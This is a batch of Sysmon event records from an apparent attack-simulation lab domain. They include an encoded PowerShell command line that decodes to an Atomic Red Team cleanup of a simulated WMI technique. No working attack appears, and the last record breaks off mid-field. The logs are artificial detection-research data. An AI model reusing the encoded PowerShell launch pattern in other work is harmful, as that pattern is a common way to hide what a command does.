{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5711,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5712,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5713,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5714,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5715,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00109A2B0900}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00109A2B0900}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5716,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.378\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00109A2B0900}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.378","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00109A2B0900}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5717,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.411\r\nProcessGuid: {41C8662E-20D9-5F25-0000-0010C12C0900}\r\nProcessId: 4168\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.411","ProcessGuid":"{41C8662E-20D9-5F25-0000-0010C12C0900}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5718,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.P